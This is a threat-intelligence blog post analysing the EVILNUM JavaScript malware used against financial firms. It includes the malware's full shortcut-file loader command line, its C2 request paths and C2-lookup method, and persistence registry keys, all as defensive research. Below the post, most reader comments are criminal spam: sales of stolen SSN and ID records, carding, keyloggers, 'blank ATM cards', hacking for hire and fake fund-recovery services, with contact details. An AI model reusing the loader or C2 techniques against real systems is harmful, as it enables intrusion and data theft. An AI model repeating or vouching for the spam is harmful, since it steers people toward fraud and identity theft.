Wednesday, May 6, 2020

Phantom in the Command Shell

Author: Danny Adamitis 

Executive Summary

Prevailion’s Tailored Intelligence Team has detected two new criminal campaigns targeting the global financial industry with the EVILNUM malware, one of which became active on May 3rd 2020. We have dubbed these new operations “Phantom in the [Command] Shell”.

In these engagements, the attack begins when a victim is enticed into following a link to a file hosted on a well known, widely-used cloud provider - unaware that email filters are unlikely to block the domain, and the provider will trust their own links enough that a scan is unlikely. Once engaged, the victim’s device downloads a compressed folder that contains trojanized files. This is a user-initiated infection; meant to appear as a typical business interaction, in this case part of “Know Your Customer” banking procedures. These trojanized files use images of credit cards, driver’s licenses, passports, and utility bills. When the files are opened, the decoy images are displayed to the user, while an agent written in headless Javascript is surreptitiously invoked. Investigation of the agent reveals code comment indicating the two latest iterations are version 3.6 and 4.0, respectively. Both are designed for Windows OS.

The first version of EVILNUM was identified in 2018; the second version was discovered in an unrelated incident response investigation a year later, having infiltrated a FINTECH company. The initial reporting on this malware was the only sign of its presence, as it briefly faded from view.

EVILNUM has surfaced again in the financial sector with a new variant that has evolved with a very effective tool designed to evade both standard network- and host-based detection systems. It uses supplementary logic designed to help it adapt to the local system and alter its actions - and even the choice of C2 - based upon the antivirus products that are detected on the host machine. This agent allows the threat actor to upload files, download files, run commands, steal cookies and access other protected data. It is designed to persist through reboot by adding a registry key, and even removes artifacts of its presence from the host machine. Given the versatility added to this variant, we suspect that this agent has the capacity to load auxiliary payloads onto a host machine.

Technical Details


Prevailion has discovered an updated variant of the deceptive EVILNUM agent. This agent was delivered to victims from a URL on a cloud-platform that hosts a zip file. If the link is clicked, the victim downloads a compressed folder riddled with trojanized files that masquerade as PDFs and JPEGs. These files display themselves as seemingly innocuous decoys to the end user, all while quietly running in the background. The first version of EVILNUM malware was observed and reported in 2018. The second version was reported by Palo Alto, targeting a specific financial technology (FinTech) organization. This report covers the latest versions 3.6 and 4.0, how they’re delivered, evasion techniques, and communications channels.

Infection Vector

The infection chain begins when the victim receives a link to a Uniform Resource Locator (URL) hosted on a cloud-based platform, in this case GoogleDrive. This technique is increasingly used to avoid intrusion detection system (IDS) rules, by hosting the malicious file on a 3rd party platform that was likely whitelisted. When that link is clicked and traffic to GoogleDrive is initiated, it begins the process of downloading a compressed folder from that location. 
Phantom in the command shell campaign walk through

Microsoft Link Lures

Prevailion has thus far identified two compressed files harboring the subject malware, although there is evidence to suggest that more zip folders exist. Once decompressed, the folder is found to contain microsoft shortcut (lnk) files that were named to impersonate either jpeg or pdf files. We have categorized these lnk files into two subcategories. The first set of lures uses the basic Know Your Customer (KYC) elements as a ruse, these elements are files that anyone would be asked for when opening a new account with a finance services organization. Some examples include but are not limited to driver’s license, credit cards, credit history documents, and proof of address paperwork. The second subcluster includes a document that appears to impersonate an established financial services organization, and referenced their 2020 GDPR compliance plan. Given the nature of these lures, Prevailion suspects with moderate confidence these efforts were targeted towards select financial institutions rather than wide-scale spamming.

Once decompress the first zip folders contained the following KYC files:
      Driv License front.jpg.lnk
      Driv License back.jpg.lnk
      Credit Card Front.jpg.lnk
      Credit Card Back.jpg.lnk
      Utility Bill.jpg.lnk.

The name on the drivers license corresponds to a real person, who happens to be the CEO of a Bank located in a British territory. The address on the utility bill matches the city of the bank. The second compressed folder was very similar to the first, containing various KYC documents and impersonated a Canadian person who we suspect works for a different financial organization. The last KYC client file that we identified was a Finnish national that we suspect works for a managed cloud services provider. Prevailion was unable to confirm if these documents were authentic, however if forged they closely resemble the genuine article.

The second subcategory contains a file name that references an organization rather than an individual. The document impersonates an investment company located in England.  Like the previously mentioned lnk files, when clicked by the user it launches a script to run in the background of the computer.

As we mentioned, there is added functionality built into this particular agent, and one element is in the display of a decoy file that corresponds to the selected file name. We analysed the properties of the lnk file themselves with lnk parser to search for clues left behind by the actor. However all the lnk files had the same forged metadata; the files were timestomped with a creation date of September 5th, 2018, from a VMWare device based upon the mac address, that had a NetBIOS name of “admin-pc”, suggesting they went to some lengths to obfuscate the metadata related to their activities. The lnk file properties can be found below. 

[Distributed Link Tracker Properties]
Version:                                      0
NetBIOS name:                          admin-pc
Droid volume identifier:              a82e4430-d4a8-417a-b678-88e886bec590
Droid file identifier:                     8cb9d0c4-b0f4-11e8-b065-005056c00008
Birth droid volume identifier:      a82e4430-d4a8-417a-b678-88e886bec590
Birth droid file identifier:             8cb9d0c4-b0f4-11e8-b065-005056c00008
MAC address:                            00:50:56:c0:00:08
UUID timestamp:                       09/05/2018 (10:15:01.429) [UTC]
UUID sequence number:           12389

Loader Functionality

Opening any one of the files, such as “Credit Card Front,” executes a protracted command line argument. The first operation moves the file to the Temp folder and renames it “1.lnk”. Then it proceeds to search for all the files that start with “Cred” in the Temp directory, and search recursively in all directories modified that day. Next it reads the 1.lnk file and redirects the output into a new file named 0.js, It then uses csript to execute that file. The command is as follows:

"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card front.jpg.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"

Core Agent

This file, 0.js, is the main agent deployed to the victim’s machine. It's written in Phantom and this particular script was designed for Windows OS. One comment in the code suggested that this particular iteration was version 3.6. One of our favorite elements was the use of a one-way communication method to obtain the C2, in order to remain elusive. This agent also built in a function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack. 

Once initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to obtain the following information:
      AntiVirus Products

This agent had traditional trojan functionality, that allowed it to perform the following tasks:
      Upload files
      Download files
      Harvest cookies 
      Get Files, from the C2,
      Run arbitrary commands
      Run Windows Script Component (.sct) files
      Call a python 2.7 interpreter through rundll32
      Log any errors that the agent generated

One difference between this variant and previous iterations is the removal of the screenshot functionality. This agent did maintain some original functions such as: bringing files down from the C2, and converting strings of data into bytes and receiving binary data. This suggests the agent was capable of retrieving subsequent payloads, indicating it was likely just a first stage agent.

Retrieval of C2 Address

One of the first things the agent does is ping google to check for an internet connection. If the host machine is connected to the internet, the agent proceeds to kill any instances of Internet Explorer which have the command line parameter matching “-Embedding.” It then uses Internet Explorer to retrieve a remote web page that acts as a one-way communication method, that web page contains a string that identifies the corresponding C2 node.

Like the previous variants of EVILNUM, the actor set up accounts on GitLab and Digital Point, a web forum. The four primary URLs used as drop sites for one-way communications were:

The actor likely set up two web pages that corresponded to each campaign for redundancy. The function would periodically check those two web pages every 180000 seconds (50 hours).
Metadata properties of the most recent campaign show that the “bliblobla123” Gitlab account was created on May 3rd, 2020.
Image showing the date when the Gitlab account was created
Image showing the latest C2 embedded in the README.MD file

The “johndeer123” Digital Point account associated with version 3.6, was created on February 21, 2019. One of the differences in the 3.6 and 4.0 variants is that the agent obtains the IP address through a regex search for the string “8346758545”. On the Digital Point web forum instance the observed C2, hxxp://185.62.190[.]89, was stored as a value in the “interest” field.
Image of Johndeer123 Digital Point Profile

If the host is running BitDefender, EVILNUM will reach out to a different URL
hxxps:// The agent then searches for the same string “8346758545”. There is also some fallback functionality to use “long2ip”, the arithmetic based method, implemented in the previous agent. This method takes the number then divides it by 8 and converts it to an IP address.

Command and Control Communications

Once the agent obtains the IP address it will send a GET request to check.php. If the IP address is indeed the correct C2, it returns a message padded with “jifhruhajsdfg444” on each side. In this case it received a padded “success” message:

Wireshark stream of a check interaction from the victim to the C2

Once the agent confirms the correct IP address, it proceeds to send a register request. In this POST it sent the host based enumeration information. Once received the
C2 responded with the agent’s unique identifier that will then get saved at
appDataPath + \\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\id.txt.

Image of the register function with version 3.6 on the left and 4.0 on the right

Based upon code analysis the following HTTP requests and parameters were identified:
      “check.php?id="+id + "&ver="+ ver
      Agent confirms it has the right IP address and sends version number
      “register.php?av=" + av + "&cpu-name=" + cpuName + "&ref="+ REFNAME + "&user=" + userName
      Registers the agent with the C2 and obtain unique identifier
      "view.php", "id=" + id);
      Get commands from the C2
      Upload harvested cookies to the C2
      "DOWNLOAD_FILE.php".toLowerCase(), "FILE-URL=".toLowerCase() + fileURL
      Download file from C2 then place in tmp and appData folders
      "send.php?id="+id, filePath, "uploaded_file"
      Upload file from infected host to C2
       "upload.php?id="+id, sctFile, "uploaded_file"
      obtain windows script component from from C2, then store it “878478ddd3.TMP”


As we described, the agent will persist through a reboot by adding a registry key. This is the same technique that was used in the 2.0 version. One notable feature is that the actor added logic to modify the registry key location, based on the antivirus product that was detected during the enumeration phrase. In the previous version, it would only specify what to do when BitDefender was installed on the host. The new version added functionality to account for Avast.  If either one of those two antivirus specific products were detected it created a registry key at:
If there is no antivirus product detected - or something other than BitDefender and Avast - it will create a registry key at:
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows.

Both keys will then run a shortcut file specified at the path:

This shortcut file maps to the media.js file, which contains a copy of the core agent. This set of registry persistence modifications are stored in a file named media.reg.

The second registry modification file, mediaIE.reg, is the same file that has been used since version 1 of EVILNUM. These registry modifications appear to have remained consistent with the newest iteration versions. The modifications are intended to weaken the security of the host machine. For example -  one modification removes the “no protect mode” banner, potentially luring victims into a false sense of security. Another example is the removal of a feature of CCleaner that clears data downloaded from browsers, this is likely meant to ensure downloaded scripts or tools were not removed. The registry keys and modified parameters are listed below.
      HKEY_CURRENT_USER\\Control Panel\\Cursors "AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,0
      This decodes to “%.S.y.s.t.e.m.R.o.o.t.%.\.c.u.r.s.o.r.s.\.a.e.r.o._.a.r.r.o.w...c.u.r…”
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PhishingFilter
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ Advanced
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3


The Phantom in the Command Shell campaign shows that the threat actors behind the EVILNUM malware family are constantly advancing their techniques as they continue to focus their efforts on the global banking/financial system. The differences between the 3.6 and 4.0 variants appear to be trivial and do not affect functionality.

This group has been targeting the financial sector since 2018 and has achieved success due to their ability to use innovative methods to stay ahead of defensive measures, such as the use of javascript-based agents instead of relying upon more commonly used methods such as executable files. They have continued to evolve this agent by modifying the location of certain files to avoid detection by specific antivirus products and changing communications patterns when certain products are being employed. They created an elaborate command and control retrieval tactic by embedding instructions to use well known platforms, in order to bypass detection. They also configured the agent to use different C2 nodes depending on the security products used by the host machine.

One possible way to protect against this threat, is to disable Microsoft shortcut files on high risk machines that routinely interact with untrusted parties. These high risk machines should also be segmented within the network to impede attackers' ability to spread laterally if they were compromised. We recommend routinely monitoring network logs to check for abnormal connections to IP addresses associated with virtual private servers.

Prevailion has shared our findings with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit

Indicators of Compromise

GDrive URLs

Zip Files

Microsoft ShortCut (Lnk) Files

Core Agent
Javascript agent version 4.0
Javascript agent version 3.6
Javascript agent version 3.5

Actor created Folders
appData + \\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\
appData + \\Microsoft\\Credentials\\MediaPlayer\\UtilitiesLog\\

C2 Retrieval URLs

Command and Control Node

MITRE ATT&CK Framework Mapping
Initial Access
Spear Phishing Link (T1192)
User Execution (T1204)
Registry Run Keys / Startup Folder (T1060)
Defensive Evasion
Timestomping (T1099), Indicator Removal from host (T1070),
Modify Registry (T1112), Hidden Window (T1143), rundll32 (T1085),
Credential Access
Steal Web Session Cookie (T1539)
Data from Local System (T1005),  Data Staged (T1074)
Command & Control
Commonly used port (T1043), Web service (T1102),
Remote File copy (T1105)
Exfiltration Over Command and Control Channel (T1041)


  1. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

  2. This is really fascinating, You are a very professional blogger. I’ve joined your rss feed and sit up for searching for more of your great post. Also, I have shared your site in my social networks! Eradicate Error

    1. Hello all
      am looking few years that some guys comes into the market
      they called themselves hacker, carder or spammer they rip the
      peoples with different ways and it’s a badly impact to real hacker
      now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
      Anyone want to make deal with me any type am available but first
      I‘ll show the proof that am real then make a deal like

      Available Services

      ..Wire Bank Transfer all over the world

      ..Western Union Transfer all over the world

      ..Credit Cards (USA, UK, AUS, CAN, NZ)

      ..School Grade upgrade / remove Records

      ..Spamming Tool

      ..keyloggers / rats

      ..Social Media recovery

      .. Teaching Hacking / spamming / carding (1/2 hours course)

      discount for re-seller

      Contact: 24/7

      [email protected]

  3. Are you interested in trading bitcoin binary and forex trade where you can earn 100% of your investment daily If you invest as low as $200 you will get a profit of $2,000 after 72 hours if you are intrested you can contact him via email: [email protected] +12132951376(WHATSAPP)

  4. Excellent post i'm not gonna tell you more about this post bcause many users already takes my word so no more comment just great job.. brother..

    may you time see also a little help from your side


  5. Hi Viewers Get your Blank ATM card that works in all ATM machines all over the world.. We have specially programmed ATM cards that can be used to hack ATM machines, the ATM cards can be used to withdraw at the ATM or swipe, at stores and POS. We sell this cards to all interested buyers worldwide, the card has a daily withdrawal limit of $1,000 on ATM and up to $20,000 spending limit in stores depending on the kind of card you order for, we are here for you anytime, any day. Email; ([email protected]) I'm grateful to Mike because he changed my story all of a sudden . The card works in all countries except, contact him now ([email protected])

  6. I high appreciate this post. It’s hard to find the good from the bad sometimes, but I think you’ve nailed it! would you mind updating your blog with more information.

  7. Welcome. DO NOT BE TROUBLED ANYMORE. you’re at the right place. Nothing like having trustworthy Hackers. have you lost money before or bitcoins and you are looking for a hacker to get your money back? You should contact us right away. It's very affordable and we give guarantees to our clients. Our hacking services are as follows:
    -Hack into any kind of phone
    _Increase Credit Scores
    _Western union, bitcoin and money gram hacking
    _Criminal records deletion_BLANK ATM/CREDIT CARDS
    _Hacking of phones(that of your spouse, boss, friends, and see whatever is being discussed behind your back)
    _Security system hacking... and so much more. Contact THEM now and get whatever you want at
    Email: [email protected]

      Whatsapp: +1-(781)-656-7138.  

    There are so many Reasons why people need to hire a hacker, It might be to Hack a Websites to deface informations, retrieve information, edit information or give you admin access.
    • Some people might need us To Hack Their Target Smartphone so that they could get access to all activities on the phone like , text messages , call logs , Social media Apps and other informations
    • Some might need to Hack a Facebook , gmail, Instagram , twitter and other social media Accounts,
    • Also Some Individuals might want to Track someone else's Location probably for investigation cases
    • Some might need Us to Hack into the Court's Database to Clear criminal records.
    • However, Some People Might Have Lost So Much Funds With BINARY OPTIONS BROKERS or BTC MINING and wish to Recover Their Funds
    • All these Are what we can get Done Asap With The Help Of Our Root HackTools, Special HackTools and Our Technical Hacking Strategies Which Surpasses All Other Hackers.

    * Credit Cards Loading ( USA Only )
    * BANK Account Loading (USA Banks Only)

    ★ You can also contact us for other Cyber Attacks And Hijackings, we do All★
      Whatsapp: +1-(781)-656-7138.   

    * For Binary Options Recovery, Feel free to contact us via Email: [email protected] for a wonderful job well done, Stay Safe.


  8. i do a lot of heavy exercise twice a week and it really helped my health to be on excellent condition;Speakers Black Friday Deals

  9. Hello all
    am looking few years that some guys comes into the market
    they called themselves hacker, carder or spammer they rip the
    peoples with different ways and it’s a badly impact to real hacker
    now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
    Anyone want to make deal with me any type am available but first
    I‘ll show the proof that am real then make a deal like

    Available Services

    ..Wire Bank Transfer all over the world

    ..Western Union Transfer all over the world

    ..Credit Cards (USA, UK, AUS, CAN, NZ)

    ..School Grade upgrade / remove Records

    ..Spamming Tool

    ..keyloggers / rats

    ..Social Media recovery

    .. Teaching Hacking / spamming / carding (1/2 hours course)

    discount for re-seller

    Contact: 24/7

    [email protected]

  10. Greetings....

    Check out these Credit Cards today.
    My name is Jamie West from Denver. A successful business owner and father. I got one of these already programmed Credit cards that allows me to withdraw a maximum of $7,500 daily for 30 days. I am so happy about these cards because I received mine last week and have already used it to get $45,000. Mr Frank Carlos of Email: [email protected]  is giving out these cards to support people in any kind of financial problem. I must be sincere to you, when i saw the advert, I believed it to be illegal and a hoax but when I contacted Mr Frank Carlos, he confirmed to me that although it is illegal, nobody gets caught while using these cards because they have been programmed to disable every communication once inserted into any Automated Teller Machine(ATM). If interested contact him as soon as possible Email: [email protected]

    WhatsApp: +1-781-656-7138.

  11. It’s a question you wish you didn’t have to ask, but it’s a necessary one if you’ve been scammed. I’ve seen my fair share of internet scams over the years, so I know how it feels. The good news is, I also know some practical ways you can go about getting your money back from the scammers.
    There are many types of scams online. From your typical ‘get rich quick’ scams, to investment and dating scams. The list goes on and on. You name it, there’s probably a scam for it. But regardless of what type of scam you’ve fallen victim to with the right information, you’ll be able to recover your funds back.
    It can be an absolutely terrible feeling when you get scammed online, especially if it’s your first time. But you can get it back if you follow the guidelines I’ll show you.
    Firstly, when you notice you’ve been scammed online or involved in online fraud one way or the other and in the process you lost your funds, the first thing you’ll need to do is contact any law enforcement agency close to you. The chance of law enforcement to recover your funds back into your account is slim so you don’t have to depend on them to recover your funds but it’s always good to report the case no matter how embarrassing the scam might be.
    Secondly, you’ll need to take the case further to a recovery company to assist you with the recovery of your funds and only a few recovery firms can do this. I will recommend RECOVERYWEALTHNOW360 on google mail. They are a legitimate recovery company that is registered and they also provide their license ID to the public to show their legitimacy. They assist individuals and companies recoup their funds from fraudulent Investment platforms, ICO and Romance scams. As long as the fraud is done online, they are up to the task of recovering the funds. Send a complaint email to recoverywealthnow360 on google mail


The Gh0st Remains the Same

Author:  Danny Adamitis   Executive Summary  Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “...